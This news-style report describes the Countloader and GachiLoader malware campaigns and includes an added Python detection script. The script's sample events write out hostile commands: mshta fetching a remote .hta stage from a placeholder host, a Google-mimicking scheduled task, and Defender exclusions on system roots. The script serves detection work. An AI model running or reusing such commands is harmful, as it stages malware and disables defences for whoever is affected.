Cybersecurity researchers have revealed details of a new campaign that uses cracked software distribution sites as a delivery vector for a new variant of the modular, stealthy loader called Countloader.
The campaign “uses Countloader as the initial tool in a multistage attack to access, steal, and distribute additional malware families,” the Siderace Howler Cell threat intelligence team said in an analysis.
Countloader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Ametra Stealer, and PureMiner. The loader has been found in the wild since at least June 2025.
The latest attack series begins when unsuspecting users attempt to download cracked versions of legitimate software such as Microsoft Word, causing them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains a Microsoft Word document with an encrypted ZIP file and a password to open the second archive.
Contained within the zip file is an altered legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve Countloader 3.2 from a remote server using “mshta.exe”.
To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It is configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain.
It also checks whether CrowdStrike’s Falcon Security Appliance is installed on the host by querying the antivirus list through Windows Management Instrumentation (WMI). If the service is detected, it runs the persistence command as “cmd.exe /c start /b mshta.exe
Countloader is equipped to profile the compromised host and fetch the next-stage payload. The latest version of the malware adds the ability to propagate via removable USB drives and execute the malware directly in memory via “mshta.exe” or PowerShell. The complete list of supported features is as follows:
- Download an executable from a given URL and execute it
- Download a zip archive from the given URL and execute either a Python-based module or an EXE file contained within it
- Download the DLL from the given URL and run it via “rundll32.exe”
- Download an MSI installer package and install it
- Delete the scheduled task used by the loader
- Gather and export comprehensive system information
- Spread via removable media by creating malicious shortcuts (LNK) next to their hidden native counterparts, which, when launched, execute the original file and run the malware via “mshta.exe” with the C2 parameter.
- Launch “mshta.exe” directly against the given URL
- Execute a remote PowerShell payload in memory
In the attack chain observed by Siderace, the final payload deployed by Countloader is an information stealer known as ACR Stealer, which is equipped to collect sensitive data from infected hosts.
“This campaign highlights the ongoing evolution and increased sophistication of Countloader, reinforcing the need for proactive detection and layered defense strategies,” Siderace said. “Its ability to deliver ACR Stealer through a multi-stage process from tampering with Python libraries to in-memory shellcode unpacking highlights the growing trend of unsigned binary abuse and fileless execution tactics.”
YouTube Ghost Network Delivers GachiLoader
The disclosure comes as Check Point detailed a new, highly obscure JavaScript malware loader called GachiLoader that is written in Node.js. The malware is distributed through the YouTube Ghost Network, a network of YouTube accounts engaged in malware distribution.
“A variant of Gachiloader deploys a second-stage malware, KidKaddy, which applies a new technique for portable executable (PE) injection,” said security researchers Sven Rath and Jaromír Horejsí. “This technique loads a legitimate DLL and abuses vectored exception handling to immediately replace it with a malicious payload.”
Nearly 100 YouTube videos have been flagged as part of the campaign, garnering nearly 220,000 views. These videos were uploaded from 39 hacked accounts, and the first video was dated December 22, 2024. Most of these videos have since been removed by Google.
In at least one case, GachiLoader served as a vehicle for the Rhadamanthys information-stealing malware. Like other loaders, GachiLoader is used to deploy additional payloads on an infected machine, and it executes a series of anti-analysis checks to fly under the radar.
It also checks whether it is running in an elevated context by running the “net session” command. In case the execution fails, it attempts to start itself with administrator privileges, which, in turn, triggers a User Account Control (UAC) prompt. There is a high chance that the victim will allow it to continue, as malware is likely to be distributed through fake installers for popular software, as reported in the case of Countloader.
In the final step, the malware attempts to kill “SecHealthUI.exe”, a process associated with Microsoft Defender, and configures Defender exclusions to prevent the security solution from flagging malicious payloads in certain folders (for example, C:\Users\, C:\ProgramData\, and C:\Windows\).
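The behaviours described for Countloader (mshta.exe fetching a remote stage and a Google-mimicking scheduled task that re-runs it) and for GachiLoader (Defender exclusions on whole system roots) can be hunted in process-creation telemetry. The following is an added detection example, not code from either report; the event records, domains and task arguments are constructed samples, and the rule names are hypothetical.

```python
import re

# Constructed sample process-creation records (not real telemetry), modelled on
# the behaviours the article attributes to Countloader and GachiLoader.
SAMPLE_EVENTS = [
    {"image": "mshta.exe",
     "cmd": "mshta.exe http://stage.example.invalid/payload.hta"},
    {"image": "schtasks.exe",
     "cmd": 'schtasks /create /tn "GoogleTaskSystem136.0.7023.12" /sc minute '
            '/mo 30 /tr "mshta.exe http://fallback.example.invalid/x"'},
    {"image": "powershell.exe",
     "cmd": "powershell -c Add-MpPreference -ExclusionPath C:\\Users\\"},
    # Benign look-alikes that the rules must not flag.
    {"image": "mshta.exe", "cmd": "mshta.exe C:\\Program Files\\App\\ui.hta"},
    {"image": "schtasks.exe",
     "cmd": 'schtasks /create /tn "GoogleUpdateTaskMachineUA" /xml C:\\t.xml'},
    {"image": "powershell.exe",
     "cmd": "powershell -c Add-MpPreference -ExclusionPath C:\\Dev\\build\\"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Google-like task name that carries a Chrome-style version string.
LOOKALIKE_TASK = re.compile(r'/tn\s+"?Google\w*\d+\.\d+\.\d+\.\d+', re.IGNORECASE)
EXCLUSION_ARG = re.compile(r"-ExclusionPath\s+['\"]?([^'\"\s,]+)", re.IGNORECASE)
BROAD_ROOTS = {"c:\\users\\", "c:\\programdata\\", "c:\\windows\\"}

def classify(event):
    image, cmd = event["image"].lower(), event["cmd"]
    lower = cmd.lower()
    hits = []
    # Countloader: mshta.exe pulling a stage from a remote server.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_url")
    # Countloader persistence: Google-mimicking task whose action is mshta.exe.
    if image == "schtasks.exe" and "/create" in lower and "mshta" in lower \
            and LOOKALIKE_TASK.search(cmd):
        hits.append("lookalike_task_runs_mshta")
    # GachiLoader: Defender exclusion covering an entire system root.
    m = EXCLUSION_ARG.search(cmd)
    if "add-mppreference" in lower and m:
        root = m.group(1).lower().rstrip("\\") + "\\"
        if root in BROAD_ROOTS:
            hits.append("defender_exclusion_broad_root")
    return hits

def hunt(events):
    # Map each record index to its rule hits, keeping only flagged records.
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Running hunt(SAMPLE_EVENTS) flags only the first three records; the local .hta launch, the genuine-looking Google update task and the narrow exclusion path produce no hits.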
GachiLoader then proceeds to either fetch the final payload directly from a remote URL or employ another loader called “kidkadi.node”, which loads the main malware by abusing vectored exception handling.
“The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up to date with malware techniques like PE injection and actively look for new ways in which malware authors try to avoid detection.”